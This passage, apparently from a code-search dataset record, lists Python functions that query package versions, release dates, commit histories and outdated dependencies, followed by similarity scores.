self.client.get(f\"/images/{self.id}/history\")\n body = response.json()\n\n if response.status_code == 200:\n return body\n\n if response.status_code == 404:\n raise ImageNotFound(body[\"cause\"], response=response, explanation=body[\"message\"])\n raise APIError(body[\"cause\"], response=response, explanation=body[\"message\"])", "def main(\n req_files,\n verbose=False,\n outdated=False,\n latest=False,\n verbatim=False,\n repo=None,\n path=\"requirements.txt\",\n token=None,\n branch=\"master\",\n url=None,\n delay=None,\n):\n requirements = []\n\n if repo:\n github_url = build_github_url(repo, branch, path, token)\n req_file = get_requirements_file_from_url(github_url)\n requirements.extend(parse_req_file(req_file))\n elif url:\n req_file = get_requirements_file_from_url(url)\n requirements.extend(parse_req_file(req_file))\n else:\n for req_file in req_files:\n requirements.extend(parse_req_file(req_file, verbatim=verbatim))\n req_file.close()\n\n total_time_delta = 0\n max_outdated_time = 0\n results = []\n\n for req, version, ignore in requirements:\n if verbatim and not req:\n results.append(version)\n elif req:\n results.append(\n {\n \"req\": req,\n \"version\": version,\n \"ignore\": ignore,\n \"latest\": request(get_pypi_url(req)),\n \"specified\": request(get_pypi_url(req, version)),\n }\n )\n\n for result in results:\n if isinstance(result, str):\n print(result.replace(\"\\n\", \"\"))\n continue\n\n if result[\"ignore\"]:\n if verbatim:\n print(\"{}=={} # norot\".format(result[\"req\"], result[\"version\"]))\n else:\n print(\"Ignoring updates for {}. \".format(result[\"req\"]))\n continue\n\n req = result[\"req\"]\n version = result[\"version\"]\n\n latest_version, latest_release_date = get_version_and_release_date(\n req, verbose=verbose, response=result[\"latest\"]\n )\n specified_version, specified_release_date = get_version_and_release_date(\n req, version, response=result[\"specified\"]\n )\n\n if latest_release_date and specified_release_date:\n time_delta = (latest_release_date - specified_release_date).days\n total_time_delta = total_time_delta + time_delta\n max_outdated_time = max(time_delta, max_outdated_time)\n\n if verbose:\n if time_delta > 0:\n print(\n \"{} ({}) is {} days out of date. \"\n \"Latest is {}\".format(req, version, time_delta, latest_version)\n )\n elif version != latest_version:\n print(\n \"{} ({}) is out of date. 
\"\n \"Latest is {}\".format(req, version, latest_version)\n )\n elif not outdated:\n print(\"{} ({}) is up to date\".format(req, version))\n\n if latest and latest_version != specified_version:\n print(\n \"{}=={} # Updated from {}\".format(\n req, latest_version, specified_version\n )\n )\n elif verbatim and latest_version != specified_version:\n print(\n \"{}=={} # Latest {}\".format(req, specified_version, latest_version)\n )\n elif verbatim:\n print(\"{}=={}\".format(req, specified_version))\n\n elif verbatim:\n print(\"{}=={} # Error checking latest version\".format(req, version))\n\n verbatim_str = \"\"\n if verbatim:\n verbatim_str = \"# Generated with piprot {}\\n# \".format(VERSION)\n\n if total_time_delta > 0 and delay is None:\n print(\n \"{}Your requirements are {} \"\n \"days out of date\".format(verbatim_str, total_time_delta)\n )\n sys.exit(1)\n elif delay is not None and max_outdated_time > int(delay):\n print(\n \"{}At least one of your dependencies is {} \"\n \"days out of date which is more than the allowed\"\n \"{} days.\".format(verbatim_str, max_outdated_time, delay)\n )\n sys.exit(1)\n elif delay is not None and max_outdated_time <= int(delay):\n print(\n \"{}All of your dependencies are at most {} \"\n \"days out of date.\".format(verbatim_str, delay)\n )\n else:\n print(\n \"{}Looks like you've been keeping up to date, \"\n \"time for a delicious beverage!\".format(verbatim_str)\n )", "def get_details(self, repo=None):\n api_json = []\n\n #get all branches from this repo\n branches = self.make_branches(self.getBranch(repo))\n\n today = datetime.date.today()\n yesterday = today - datetime.timedelta(2)\n\n for branch in branches:\n args = {\"per_page\": \"100\",\n \"sha\": branch,\n \"author\": self.username,\n \"since\": yesterday.isoformat()}\n args = self.make_args(args)\n repo_url = \"/\".join([self.url, \"repos\", repo, \"commits\"])\n repo_url = repo_url + args\n\n request = urllib2.Request(repo_url, headers=self.headers)\n response = urllib2.urlopen(request)\n raw_data = response.read()\n commits_info = self.process_factory(simplejson.loads(raw_data))\n api_json = api_json + commits_info\n\n print repo_url\n\n print api_json\n return api_json", "def get_resource_last_update_timestamp(api_1_0_url, resource):\n try:\n r = requests.get(api_1_0_url)\n json_string = r.content\n data = json.loads(json_string)\n try:\n files = data['files']\n for entry in files:\n if entry['path'] == resource:\n entry_last_update_timestamp = entry['utctimestamp']\n return entry_last_update_timestamp\n except Exception as error:\n print(\"Caught error: \" + repr(error))\n except Exception as error:\n print(\"Failed to connect to bitbucket: \" + repr(error))\n exit(1)\n return None", "def get_video_title_releaser_release_time(self, url):\n video_id = ' '.join(re.findall('id.*html', url))\n browser = webdriver.Chrome()\n browser.get(url)\n title = browser.find_element_by_id('subtitle').text\n releaser = browser.find_element_by_id('module_basic_sub').text\n releaser = releaser.replace('+订阅','')\n releaser = releaser.replace(' ','')\n try:\n rt_midstep = browser.find_element_by_class_name('video-status').text\n rt_midstep = rt_midstep.replace('上传于','')\n rt_midstep = rt_midstep.replace(' ','')\n release_time = int(datetime.datetime.strptime(rt_midstep,'%Y-%m-%d').timestamp()*1e3)\n except:\n release_time = 0\n fetch_time = int(datetime.datetime.timestamp(datetime.datetime.now())*1e3)\n D0 = {'video_id': video_id,\n 'title': title,\n 'release_time': release_time,\n 'url': url,\n 
'fetch_time': fetch_time}\n return D0", "def get_revision_list(self):\n response = self._get_request(\n DeckhandClient.get_path(DeckhandPaths.REVISION_LIST)\n )\n self._handle_bad_response(response)\n revisions = yaml.safe_load(response.text)\n return revisions.get('results', [])", "def all(data):\n result = list()\n for release, info in data.items():\n version = release\n python_version = Pypi._get_python_version(info)\n d = dict(version=version, python_version=python_version)\n result.append(d)\n\n return result", "def downloads_per_version(package):\n downloads = {}\n for release in package['files']:\n downloads[release['version']] = release['ndownloads']\n return downloads", "def transformar_data_to_json():\n\t# La lista de releases regresa como un <str>\n\tdeployedReleases = subprocess.check_output([\"/usr/bin/bash\",\"/usr/local/bin/gsdGetRCinServer.sh\"])\n\ttimeZoneInfo = subprocess.check_output([\"date\",\"+%Z\"]).strip()\n\n\t# Separamos el <str> por lineas\n\tdeployedReleases = deployedReleases.split()\n\n\t# Generamos diccionario inicial\n\thostname = (socket.gethostname())\n communicate = { 'server' : hostname,\n 'date': today,\n 'timezone': timeZoneInfo, \n 'applications': {} \n }\n\n\t# Parseamos todos los despliegues encontrados\n\tfor release in deployedReleases:\n\n\t\t# sanetizar los datos, debemos eliminar los \".\" dado que son representaciones especiales en mongo, el path tampoco nos importa porque es estandar\n\t\trelease = release.replace('/opt/company/deploy/', '')\n\t\trelease = release.replace('.', '-')\n\n\t\t# Verificamos si es un symlink (current es version actual desplegada)\n\t\tif 'current' in release :\n\t\t\tmarker, appAndVersion = release.split('|')\n if appAndVersion.count('/') > 1 :\n rcversion = 'RC Format is wrong'\n appname = marker.replace('/current', '')\n else:\n appname, rcversion = appAndVersion.split('/')\n\n\t\t\tif appname not in communicate['applications'] :\n\t\t\t\tcommunicate['applications'].update( { \n\t\t\t\t\t\t\t\tappname: \n\t\t\t\t\t\t\t\t\t{rcversion : 'current'} \n\t\t\t\t\t\t\t } )\n\t\t\telse:\n\t\t\t\tcommunicate['applications'][appname].update({rcversion : 'current'})\n\n\t\t# Verificamos si es un symlink (rollback es la version previa a current)\n\t\telif 'rollback' in release:\n\t\t\tmarker, appAndVersion = release.split('|')\n if appAndVersion.count('/') > 1 :\n rcversion = 'RC Format is wrong'\n appname = marker.replace('/rollback', '')\n else:\n appname, rcversion = appAndVersion.split('/')\n\n\t\t\tif appname not in communicate['applications'] :\n\t\t\t\tcommunicate['applications'].update( { \n\t\t\t\t\t\t\t\tappname: \n\t\t\t\t\t\t\t\t\t{rcversion : 'rollback'} \n\t\t\t\t\t\t\t } )\n\t\t\telse:\n\t\t\t\tcommunicate['applications'][appname].update({rcversion : 'rollback'})\n\n\t\t# Lo que no es current o rollback es un despliegue mas viejo\n\t\telse :\n appname, rcversion = release.split('/')\n if appname not in communicate['applications'] :\n communicate['applications'].update( {\n appname:\n {rcversion : 'previous'}\n } )\n else:\n if rcversion not in communicate['applications'][appname] :\n communicate['applications'][appname].update({rcversion : 'previous'})\n else :\n # La version ya fue registrada como current o rollback, esto sucede porque el symlink comparte el mismo nombre que el directorio real a nivel dict\n pass\n\n\treturn communicate", "def show_release_details(release):\n def get(key, dictionary=release):\n try:\n return dictionary[key]\n except KeyError as e:\n return None\n\n date = get('date')\n date 
= date[:4] if date else \"\"\n print(\"{} / {} ({})\".format(get('artist-credit-phrase'), get('title'), date))\n print()\n\n # print track list\n track_lists = [get(\"track-list\", medium) for medium in release['medium-list']]\n track_list = [track for tracks in track_lists for track in tracks]\n track_width = max([len(track[\"recording\"][\"title\"]) for track in track_list])\n time_width = len(get_time(sum([int(track[\"length\"]) for track in track_list])))\n\n total_ms = 0\n for idx,track in enumerate(track_list):\n title = track[\"recording\"][\"title\"]\n ms = int(track[\"length\"])\n time = get_time(ms)\n total = get_time(total_ms)\n print(\"{:2d}. {:{track_width}} {:>{time_width}} ({})\".format( \\\n idx+1, title, total, time, track_width=track_width, time_width=time_width))\n total_ms += ms\n width = 5 + track_width + time_width\n print(\"{:>{width}}\".format(get_time(total_ms), width=width))", "def query_releases(self,request):\n\n\t\t# ----------- DEBUG -----------------\n\t\tMODULE.info(\"updater/updates/query invoked with:\")\n\t\tpp = pprint.PrettyPrinter(indent=4)\n\t\tst = pp.pformat(request.options).split(\"\\n\")\n\t\tfor s in st:\n\t\t\t\tMODULE.info(\" << %s\" % s)\n\t\t# -----------------------------------\n\n\t\t# be as current as possible.\n\t\tself.uu.ucr_reinit()\n\t\tself.ucr.load()\n\n\t\tappliance_mode = self.ucr.is_true('server/appliance')\n\n\t\tresult = []\n\t\ttry:\n\t\t\trequest.status = SUCCESS\n\t\t\tavailable_versions, blocking_component = self.uu.get_all_available_release_updates()\n\t\t\tfor rel in available_versions:\n\t\t\t\tentry = {}\n\t\t\t\tentry['id'] = rel\n\t\t\t\tentry['label'] = 'UCS %s' % rel\n\t\t\t\tresult.append(entry)\n\t\t\t#\n\t\t\t# appliance_mode=no ; blocking_comp=no → add \"latest version\"\n\t\t\t# appliance_mode=no ; blocking_comp=yes → no \"latest version\"\n\t\t\t# appliance_mode=yes; blocking_comp=no → add \"latest version\"\n\t\t\t# appliance_mode=yes; blocking_comp=yes → add \"latest version\"\n\t\t\t#\n\t\t\tif len(result) and (appliance_mode or not blocking_component):\n\t\t\t\t# UniventionUpdater returns available version in ascending order, so\n\t\t\t\t# the last returned entry is the one to be flagged as 'latest' if there's\n\t\t\t\t# no blocking component.\n\t\t\t\tresult[-1]['label'] = '%s (%s)' % (result[-1]['label'],_('latest version'))\n\n\t\texcept Exception,ex:\n\t\t\trequest.status = FAILURE\n\t\t\tself.finished(request.id, [], str(ex))\n\t\t\treturn\n\n\t\t# ----------- DEBUG -----------------\n\t\tMODULE.info(\"updater/updates/query returns: %d entries\" % len(result))\n\t\tpp = pprint.PrettyPrinter(indent=4)\n\t\tst = pp.pformat(result).split(\"\\n\")\n\t\tfor s in st:\n\t\t\t\tMODULE.info(\" >> %s\" % s)\n\t\t# -----------------------------------\n\n\t\tself.finished(request.id,result)", "def fetchHistory(self, token):\n history = self.loadHistory(token)\n if len(history):\n startStamp = history[-1][\"timestamp\"] + 1000 + random.random()*1000 # Add some random number of seconds\n startDateStr = time.strftime(\"%Y%m%d\", time.gmtime(int(startStamp)))\n else:\n startDateStr = \"20130428\" # Date of the first bitcoin valuation ?\n dateStr = time.strftime(\"%Y%m%d\")\n uri = self.historyTemplate % (token, startDateStr, dateStr)\n print(\"Fetching history\")\n html = BeautifulSoup(urlrequest.urlopen(uri).read().decode(), \"html.parser\")\n print(\"parsing html\")\n dataRows = html.find(\"div\", {\"id\": \"historical-data\"}).find(\"table\", {\"id\", \"table\"}).find(\"tbody\").find_all(\"tr\", {\"class\": 
\"text-right\"})\n headers = [\"date.string\", \"open\", \"high\", \"low\", \"close\", \"volume\", \"market.cap\"]\n dataPts = []\n print(\"translating data\")\n for row in dataRows:\n rowObj = {}\n for i, td in enumerate(row.find_all(\"td\")):\n if i == 0:\n try:\n rowObj[headers[i]] = td.get_text()\n rowObj[\"timestamp\"] = helpers.stamp2dayStamp(datetime.datetime.strptime(td.get_text(), \"%b %d, %Y\").timestamp())\n except Exception:\n print(\"failed to parse float from `%s`\" % td.get_text())\n rowObj[headers[i]] = \"Dec 31, 1999\"\n elif i < 5:\n try:\n rowObj[headers[i]] = float(td.get_text())\n except Exception:\n print(\"failed to parse float from `%s`\" % td.get_text())\n rowObj[headers[i]] = 0.0\n else:\n try:\n rowObj[headers[i]] = int(td.get_text().replace(\",\", \"\"))\n except Exception:\n print(\"failed to parse integer from `%s`\" % td.get_text())\n rowObj[headers[i]] = 0\n dataPts.append(rowObj)\n for pt in sorted(dataPts, key=lambda p: p[\"timestamp\"]):\n if len(history) == 0 or pt[\"timestamp\"] > history[-1][\"timestamp\"]:\n history.append(pt)\n self.saveHistory(token, history)\n return history", "def release_date(self):\n for item in self.proto.releaseInfo.item:\n if item.label == 'Released on':\n return item.container.value", "def get_publication_versions(project, publication_id):\n connection = db_engine.connect()\n publication_versions = get_table(\"publication_version\")\n statement = select([publication_versions]).where(publication_versions.c.publication_id == int_or_none(publication_id))\n rows = connection.execute(statement).fetchall()\n result = []\n for row in rows:\n result.append(dict(row))\n connection.close()\n return jsonify(result)", "def svn_rev_info(path): # pragma: no cover\n if not os.path.isdir(os.path.join(path, '.svn')):\n path = os.path.join(path, '..')\n\n _program_dir = path\n filename = os.path.join(_program_dir, '.svn/entries')\n if os.path.isfile(filename):\n with open(filename) as entries:\n version = entries.readline().strip()\n if version != '12':\n for _ in range(3):\n entries.readline()\n tag = entries.readline().strip()\n t = tag.split('://', 1)\n t[1] = t[1].replace('svn.wikimedia.org/svnroot/pywikipedia/',\n '')\n tag = '[{}] {}'.format(*t)\n for _ in range(4):\n entries.readline()\n date = time.strptime(entries.readline()[:19],\n '%Y-%m-%dT%H:%M:%S')\n rev = entries.readline()[:-1]\n return tag, rev, date\n\n # We haven't found the information in entries file.\n # Use sqlite table for new entries format\n from sqlite3 import dbapi2 as sqlite\n with closing(\n sqlite.connect(os.path.join(_program_dir, '.svn/wc.db'))) as con:\n cur = con.cursor()\n cur.execute(\"\"\"select\nlocal_relpath, repos_path, revision, changed_date, checksum from nodes\norder by revision desc, changed_date desc\"\"\")\n _name, tag, rev, date, _checksum = cur.fetchone()\n cur.execute('select root from repository')\n tag, = cur.fetchone()\n\n tag = os.path.split(tag)[1]\n date = time.gmtime(date / 1_000_000)\n return tag, rev, date", "def get_github_chandra_models_version_info():\n with urlopen('https://api.github.com/repos/sot/chandra_models/tags') as url:\n response = url.read()\n tags = json.loads(response.decode('utf-8'))\n\n with urlopen('https://api.github.com/repos/sot/chandra_models/branches') as url:\n response = url.read()\n branches = json.loads(response.decode('utf-8'))\n\n all_versions_info = {t[\"name\"]: t for t in tags}\n all_versions_info.update({b[\"name\"]: b for b in branches})\n return all_versions_info", "def getVersions(self):\n 
logger.debug(\"Func: getVersions\")\n\n try:\n return self._currentSceneInfo[\"Versions\"]\n except:\n return []", "def GetRevisionsSample():\n client = CreateClient()\n for entry in client.GetResources(limit=55).entry:\n revisions = client.GetRevisions(entry)\n for revision in revisions.entry:\n print revision.publish, revision.GetPublishLink()", "def get_versions(start='current'):\n start = check_version_str(start)\n versions = get_linked_versions(start)\n\n results = versions[:]\n while results:\n results = get_linked_versions(results[-1])\n print results\n if results:\n versions.extend(results)\n\n versions = [x for x in set(versions) if check_manual_exists(x)]\n return sort_versions(versions, reverse=True)", "def history(self):\n return self.info['history']", "def releases(self):\r\n\r\n result = self.proxy.package_releases(self.package_name, self.include_hidden)\r\n\r\n if len(result) == 0:\r\n # no matching package--search for possibles, and limit to 15 results\r\n results = self.proxy.search({\r\n 'name': self.package_name,\r\n 'description': self.package_name\r\n }, 'or')[:15]\r\n\r\n # make sure we only get unique package names\r\n matches = []\r\n for match in results:\r\n name = match['name']\r\n if name not in matches:\r\n matches.append(name)\r\n\r\n # if only one package was found, return it\r\n if len(matches) == 1:\r\n self.package_name = matches[0]\r\n return self.releases\r\n\r\n error = \"\"\"No such package found: %s\r\n\r\nPossible matches include:\r\n%s\r\n\"\"\" % (self.package_name, '\\n'.join('\\t- %s' % n for n in matches))\r\n\r\n sys.exit(error)\r\n\r\n return result", "def greater(data, version):\n result = list()\n given_version = parse(version)\n for release, info in data.items():\n python_version = Pypi._get_python_version(info)\n ver = parse(release)\n if not ver.is_prerelease and ver > given_version:\n result.append(dict(version=str(ver), python_version=python_version))\n\n return result", "def get_comp_versions (component):\n vprint (\"Detecting current version for \" + component)\n\n regex = re.compile (r\"version \" + version_restr)\n major = component + \"_major\"\n minor = component + \"_minor\"\n micro = component + \"_micro\"\n\n\n version = (None, None, None)\n with open (doc_root + \"/ACE_TAO/\" + component + \"/VERSION.txt\") as version_file:\n for line in version_file:\n match = regex.search (line)\n if match is not None:\n version = match.groups(default=0)\n\n vprint (\"Detected version %s.%s.%s\" % version)\n\n comp_versions[major] = int (version[0])\n comp_versions[minor] = int (version[1])\n comp_versions[micro] = int (version[2])\n\n break\n\n print (\"FATAL ERROR: Unable to locate current version for \" + component)\n raise Exception\n\n # Also store the current release (old from now)\n old_comp_versions[major] = comp_versions[major]\n old_comp_versions[minor] = comp_versions[minor]\n old_comp_versions[micro] = comp_versions[micro]\n\n if opts.update:\n if opts.release_type == ReleaseType.major:\n comp_versions[major] += 1\n comp_versions[minor] = 0\n comp_versions[micro] = 0\n elif opts.release_type == ReleaseType.minor:\n comp_versions[minor] += 1\n comp_versions[micro] = 0\n elif opts.release_type == ReleaseType.micro:\n comp_versions[micro] += 1\n\n def make_version (versions, joiner):\n return joiner.join ([\n str (versions[component + '_' + x]) for x in ReleaseType.__members__.keys ()\n ])\n\n comp_versions [component + \"_version\"] = make_version (comp_versions, '.')\n comp_versions [component + \"_version_\"] = make_version 
(comp_versions, '_')\n\n comp_versions [component + \"_code\"] = \\\n (comp_versions[major] << 16) + \\\n (comp_versions[minor] << 8) + \\\n comp_versions[micro]\n\n old_comp_versions [component + \"_version\"] = make_version (old_comp_versions, '.')\n old_comp_versions [component + \"_version_\"] = make_version (old_comp_versions, '_')\n\n if opts.update:\n vprint (\"Updating from version %s to version %s\" %\n (old_comp_versions [component + \"_version\"], comp_versions [component + \"_version\"]))\n else:\n vprint (\"Found version %s\" %\n (comp_versions [component + \"_version\"]))\n\n # else:\n # comp_versions [component + \"_version\"] = \\\n # str (comp_versions[major]) + '.' + \\\n # str (comp_versions[minor])", "def get_diffs(history):\n\n # First get all possible representations\n mgr = plugins_get_mgr() \n keys = mgr.search('representation')['representation']\n representations = [mgr.get_by_key('representation', k) for k in keys]\n\n for i in range(len(history)):\n if i+1 > len(history) - 1:\n continue\n\n prev = history[i]\n curr = history[i+1]\n\n #print(prev['subject'], \"==>\", curr['subject'])\n #print(curr['changes'])\n for c in curr['changes']:\n \n path = c['path']\n\n # Skip the metadata file\n if c['path'].endswith('datapackage.json'): \n continue \n\n # Find a handler for this kind of file...\n handler = None \n for r in representations: \n if r.can_process(path): \n handler = r \n break \n \n if handler is None: \n continue \n\n # print(path, \"being handled by\", handler)\n\n v1_hex = prev['commit']\n v2_hex = curr['commit']\n\n temp1 = tempfile.mkdtemp(prefix=\"dgit-diff-\") \n \n try: \n for h in [v1_hex, v2_hex]: \n filename = '{}/{}/checkout.tar'.format(temp1, h)\n try:\n os.makedirs(os.path.dirname(filename))\n except:\n pass \n extractcmd = ['git', 'archive', '-o', filename, h, path]\n output = run(extractcmd)\n if 'fatal' in output: \n raise Exception(\"File not present in commit\") \n with cd(os.path.dirname(filename)): \n cmd = ['tar', 'xvf', 'checkout.tar']\n output = run(cmd) \n if 'fatal' in output: \n print(\"Cleaning up - fatal 1\", temp1)\n shutil.rmtree(temp1)\n continue \n\n # Check to make sure that \n path1 = os.path.join(temp1, v1_hex, path) \n path2 = os.path.join(temp1, v2_hex, path) \n if not os.path.exists(path1) or not os.path.exists(path2): \n # print(\"One of the two output files is missing\") \n shutil.rmtree(temp1)\n continue \n\n #print(path1, path2) \n\n # Now call the handler\n diff = handler.get_diff(path1, path2)\n\n # print(\"Inserting diff\", diff)\n c['diff'] = diff\n\n except Exception as e: \n #traceback.print_exc() \n #print(\"Cleaning up - Exception \", temp1)\n shutil.rmtree(temp1)", "def select_latest_micro_versions(versions):\n seen_minors = set()\n res = []\n\n for ver, _ in sorted(\n versions.items(),\n # Sort by (minor_version, upload_time) in descending order\n key=lambda x: (Version(x[0]).release[:2], x[1]),\n reverse=True,\n ):\n minor_ver = Version(ver).release[:2]\n\n if minor_ver not in seen_minors:\n seen_minors.add(minor_ver)\n res.insert(0, ver)\n\n return res", "def get_latest_release(account = None):\n names = get_db_name(account=account, db_type=\"compara\")\n compara = []\n for name in names:\n compara += [int(name.Release)]\n return str(max(compara))", "def get_version():\n\n with open('__init__.py') as f:\n for line in f.readlines():\n if '__version__' in line:\n apicem_version = line.strip().split(\"=\")[-1].strip(\" '\")\n if '__first_release_date__' in line:\n first_release_data_str = 
line.strip().split(\"=\")[-1].strip(\" '\")\n first_release_data = date(*[int(num) for num in first_release_data_str.split('.')])\n num_commits = get_cr_num(first_release_data)\n return '{apicem_version}.{num_commits}'.format(\n apicem_version=apicem_version, num_commits=num_commits)\n\n raise ValueError(\"could not read version\")", "def get_outdated_packages(self, pip_path=\"pip\"):\n output_re = [re.compile(r) for r in [\n # newer pip\n r'^(.+) \\(Current: (.+) Latest: (.+)\\)$',\n # old pip\n r'^(.+) \\((.+)\\) - Latest: (.+) .*$',\n ]]\n pkgs = {}\n out = self.check_output(\"%s list -o\", pip_path)\n for line in out.splitlines():\n # Warning: cannot find svn location for rst2pdf==0.93.dev-r0\n # Could not find any downloads that satisfy the requirement iotop\n if line.startswith('Warning: ') or line.startswith('Could not '):\n continue\n for out_re in output_re:\n match = out_re.match(line)\n if match:\n name, current, latest = match.groups()\n pkgs[name] = {'current': current, 'latest': latest}\n break\n else:\n raise RuntimeError(\"could not parse {0}\".format(repr(line)))\n return pkgs", "def get_latest_release_version():\n repo = GITHUB.get_user(GITHUB_OWNER).get_repo(GITHUB_REPO)\n latest_release_version = repo.get_latest_release().tag_name\n return latest_release_version", "def _find_latest():\n try:\n db = get_master_collection()\n service_details = db.find({\"master.key\": \"release\"}).sort([(\"master.value\", pymongo.DESCENDING)]).limit(1)\n for service in service_details:\n for r in sorted(service[\"master\"][\"value\"], reverse=True):\n latest_release = r\n build_list = service[\"master\"][\"value\"][r]\n break\n break\n\n latest_rel_num = str(latest_release).replace(\"_\", \".\")\n build_list = _natural_sort(build_list)\n for build in build_list:\n latest_build = build\n break\n\n latest_build_num = latest_build\n second_latest_build_num = int(latest_build_num) - 1\n latest = {\"latest_val\": latest_rel_num + \"_\" + latest_build_num,\n \"second_latest_val\": latest_rel_num + \"_\" + str(second_latest_build_num)}\n except Exception as e:\n logger.error(\"Exception in _find_latest : \" + str(e))\n return latest" ]
[ "0.6942631", "0.66807014", "0.6496823", "0.6251065", "0.6223727", "0.61681485", "0.607848", "0.605974", "0.6022348", "0.5989354", "0.59570056", "0.59270537", "0.5916981", "0.58646035", "0.5862971", "0.5855767", "0.5854523", "0.5853826", "0.58354694", "0.5833912", "0.58016866", "0.57994175", "0.5793847", "0.5746684", "0.5738796", "0.572935", "0.57211924", "0.5691585", "0.5677908", "0.5586303", "0.55843425", "0.5574024", "0.55555063", "0.5552908", "0.5476721", "0.54714394", "0.54595387", "0.545562", "0.54363096", "0.5424815", "0.541594", "0.5409819", "0.53944", "0.5383161", "0.5376013", "0.53470004", "0.5320263", "0.5311043", "0.5308224", "0.530511", "0.5304686", "0.52877504", "0.52849483", "0.52709794", "0.5261199", "0.5259902", "0.52236193", "0.52154773", "0.5167841", "0.51675165", "0.51654625", "0.51570696", "0.5132246", "0.5130527", "0.5129829", "0.5127437", "0.51268697", "0.5124996", "0.51142967", "0.5091579", "0.508297", "0.5080641", "0.50684386", "0.5036047", "0.5032809", "0.5031221", "0.5030927", "0.50291276", "0.50286126", "0.5023804", "0.50194824", "0.5016323", "0.4989104", "0.49882242", "0.49750924", "0.49718353", "0.49712974", "0.49671388", "0.4957768", "0.49558762", "0.49330983", "0.4929224", "0.49257073", "0.49222586", "0.49201712", "0.4918709", "0.49161118", "0.49135122", "0.49090317", "0.49070027" ]
0.6868364
1
Calculates X values for a given list of Y values over the range defined by the a and b parameters. The X values are obtained by dividing the given X range into equal steps between the nodes, so they are evenly distributed across the range.
def prepare_initial_nodes(x_start, x_end, nodes_y):
    # Spread the x nodes evenly over [x_start, x_end]: the step is
    # (x_end - x_start) / (len(nodes_y) - 1), so the first node falls on
    # x_start and the last on x_end.
    nodes_x = [float(x_start + ((x_end - x_start) / (len(nodes_y) - 1)) * i)
               for i in range(0, len(nodes_y))]
    nodes_y = [float(y) for y in nodes_y]
    print(nodes_x)
    print(nodes_y)
    # Pair each computed x with its corresponding y value.
    nodes = list(zip(nodes_x, nodes_y))
    return nodes
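A minimal usage sketch for the document above (assuming the flattened source reads as reconstructed here): with five y values over [0, 4] the step is (4 - 0) / (5 - 1) = 1, so the nodes land on evenly spaced x coordinates.

nodes = prepare_initial_nodes(0, 4, [1, 2, 3, 4, 5])
# prints [0.0, 1.0, 2.0, 3.0, 4.0] and [1.0, 2.0, 3.0, 4.0, 5.0]
# nodes == [(0.0, 1.0), (1.0, 2.0), (2.0, 3.0), (3.0, 4.0), (4.0, 5.0)]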
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def projectionX(xdata, ydata, nbins, xrange=None, yrange=None):\n xmin, xmax = (np.min(xdata), np.max(xdata)) if xrange is None else xrange\n ymin, ymax = (np.min(ydata), np.max(ydata)) if yrange is None else yrange\n\n x_out = np.linspace(xmin, xmax, nbins+1)\n y_out = np.empty(nbins)\n dx = np.diff(x_out)[0]\n\n selection = in_range(xdata, xmin, xmax) & in_range(ydata, ymin, ymax)\n xdata, ydata = xdata[selection], ydata[selection]\n for i in range(nbins):\n bin_data = np.extract(in_range(xdata, x_out[i], x_out[i+1]), ydata)\n y_out[i] = bin_data.size\n x_out += dx / 2.\n x_out = x_out[:-1]\n return x_out, y_out", "def neural_dist(func_a, func_b, x_range):\n func_a = func_a.numpy()\n func_b = func_b.numpy()\n return func_a.fit(func_b, x_range=x_range)[1]", "def calculate_ranges(a, b):\n try:\n ranges = list(range(0, a, a//b))\n if ranges[-1] != a:\n ranges.append(a)\n return ranges\n except ValueError:\n return [0, a]", "def profileX(xdata, ydata, nbins, xrange=None, yrange=None, drop_nan=True):\n xmin, xmax = (np.min(xdata), np.max(xdata)) if xrange is None else xrange\n ymin, ymax = (np.min(ydata), np.max(ydata)) if yrange is None else yrange\n\n x_out = np.linspace(xmin, xmax, nbins+1)\n y_out = np.empty(nbins)\n y_err = np.empty(nbins)\n dx = np.diff(x_out)[0]\n\n selection = in_range(xdata, xmin, xmax) & in_range(ydata, ymin, ymax)\n xdata, ydata = xdata[selection], ydata[selection]\n for i in range(nbins):\n bin_data = np.extract(in_range(xdata, x_out[i], x_out[i+1]), ydata)\n y_out[i] = np.mean(bin_data)\n y_err[i] = np.std(bin_data) / bin_data.size**0.5\n x_out += dx / 2.\n x_out = x_out[:-1]\n if drop_nan:\n selection = ~(np.isnan(y_out) | np.isnan(y_err))\n x_out = x_out[selection]\n y_out = y_out[selection]\n y_err = y_err[selection]\n return x_out, y_out, y_err", "def plot_linear(x_range, w, b):\n\tplt.plot(x_range, x_range * w + b)", "def fit_to_range(val: float, a: float, b: float, a1: float, b1: float) -> float:\n new_value = ((val - a) / (b - a)) * (b1 - a1) + a1\n return new_value", "def rangeX(iterations):\n if not isinstance(iterations, (tuple)):\n raise AttributeError\n return itertools.product(*map(range, iterations))", "def to_arrays(self, xmin=None, xmax=None):\n sidx = 0 if xmin is None else np.searchsorted(self.xvec, [xmin])[0]\n eidx = len(self.xvec) if xmax is None else np.searchsorted(self.xvec, [xmax])[0]\n\n if eidx < len(self.xvec) and self.xvec[eidx] == xmax:\n eidx += 1\n\n xtemp = self.xvec[sidx:eidx]\n if xmin is not None and (len(xtemp) == 0 or xtemp[0] != xmin):\n np.insert(xtemp, 0, [xmin])\n if xmax is not None and (len(xtemp) == 0 or xtemp[-1] != xmax):\n np.append(xtemp, [xmax])\n return xtemp, self(xtemp)", "def grid(x, y):\n return product(xrange(1, x+1), xrange(1, y+1))", "def slice_data(xdata, ydata, x_range):\n\tdata = zip(xdata, ydata)\n\tsliced_data = [d for d in data if d[0] >= x_range[0] and d[0] <= x_range[1]]\n\treturn array(zip(*sliced_data))", "def _lagrange2(x, y):\n\n def P(x_ip):\n total = 0\n n = len(x)\n for i in range(0, n):\n\n def g(i, n):\n tot_mul = 1\n for j in range(0, n):\n if i == j:\n continue\n if x[i] == x[j]:\n log.fatal(\n f\"Leads to division by zero (x = {x[i]}). Identical values given in x array. 
